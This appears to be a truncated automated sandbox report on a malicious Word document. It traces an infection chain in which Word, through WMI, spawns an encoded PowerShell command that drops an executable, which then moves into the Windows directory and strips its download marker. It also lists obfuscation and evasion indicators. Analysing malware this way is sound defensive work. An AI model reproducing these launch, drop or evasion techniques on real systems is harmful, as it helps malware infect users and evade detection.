Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0..............._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S... ...............H.g.....>.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....hP......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...........}..v.....S......0...............H.g.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....T......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...0...............H.g.....>.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....Z......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.R.E.L.P.A.T.H. . . . . . . . .:. ...........}..v....x^......0...............H.g.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....._......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.........}..v.....d......0...............H.g.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....e......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}.......}..v.....j......0...............H.g.....*.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....(k......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.E.R.V.E.R. . . . . . . . . .:. ...........}..v.....n......0...............H.g.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....Po......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...........}..v.....r......0...............H.g.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....xs......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.A.T.H. . . . . . . . . . . .:. ...........}..v.....w......0...............H.g.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....w......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.5.4.8...}..v....@}......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....}......0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.........}..v....H.......0...............H.g.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............H.g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e..j....9...............................}..v............0.................g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%..j....E...............................}..v....(.......0.................g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%..j....E...............................}..v............0.................g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: E_FUHKOEGDW.doc Virustotal: Detection: 53%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD 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
Source: unknown Process created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Source: unknown Process created: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe C:\Windows\SysWOW64\mfh264enc\wfapigp.exe
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Process created: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe C:\Windows\SysWOW64\mfh264enc\wfapigp.exe
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD 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
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041BB07 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 4_2_0041BB07
PE file contains an invalid checksum
Source: Ay8g9b.exe.2.dr Static PE information: real checksum: 0x65db1 should be: 0x69c37
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410CD6 push ecx; ret 4_2_00410CE9
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410E05 push ecx; ret 4_2_00410E18
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5C40 push ecx; mov dword ptr [esp], 00004180h 4_2_003C5C41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CA0 push ecx; mov dword ptr [esp], 0000ECEBh 4_2_003C5CA1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CF0 push ecx; mov dword ptr [esp], 0000DEB7h 4_2_003C5CF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5D50 push ecx; mov dword ptr [esp], 000097F2h 4_2_003C5D51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5DB0 push ecx; mov dword ptr [esp], 0000F636h 4_2_003C5DB1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_003C5E11
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E40 push ecx; mov dword ptr [esp], 00002B63h 4_2_003C5E41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E80 push ecx; mov dword ptr [esp], 00002BE4h 4_2_003C5E81
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5EF0 push ecx; mov dword ptr [esp], 000066B1h 4_2_003C5EF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F50 push ecx; mov dword ptr [esp], 00000282h 4_2_003C5F51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F90 push ecx; mov dword ptr [esp], 0000765Fh 4_2_003C5F91
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027783E push ecx; mov dword ptr [esp], 0000ECEBh 4_2_0027783F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027788E push ecx; mov dword ptr [esp], 0000DEB7h 4_2_0027788F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002778EE push ecx; mov dword ptr [esp], 000097F2h 4_2_002778EF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027794E push ecx; mov dword ptr [esp], 0000F636h 4_2_0027794F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002779AE push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_002779AF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002779DE push ecx; mov dword ptr [esp], 00002B63h 4_2_002779DF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277A1E push ecx; mov dword ptr [esp], 00002BE4h 4_2_00277A1F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277A8E push ecx; mov dword ptr [esp], 000066B1h 4_2_00277A8F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277AEE push ecx; mov dword ptr [esp], 00000282h 4_2_00277AEF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277B2E push ecx; mov dword ptr [esp], 0000765Fh 4_2_00277B2F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027DE1B push ecx; retf 4_2_0027DE30
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027D6DB push ecx; retf 4_2_0027D6F0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002777DE push ecx; mov dword ptr [esp], 00004180h 4_2_002777DF
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605E40 push ecx; mov dword ptr [esp], 00002B63h 5_2_00605E41
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605C40 push ecx; mov dword ptr [esp], 00004180h 5_2_00605C41
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605D50 push ecx; mov dword ptr [esp], 000097F2h 5_2_00605D51
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605F50 push ecx; mov dword ptr [esp], 00000282h 5_2_00605F51
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605E10 push ecx; mov dword ptr [esp], 0000AF8Ah 5_2_00605E11

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Executable created and started: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe PE file moved: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File opened: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004035A9 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_004035A9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office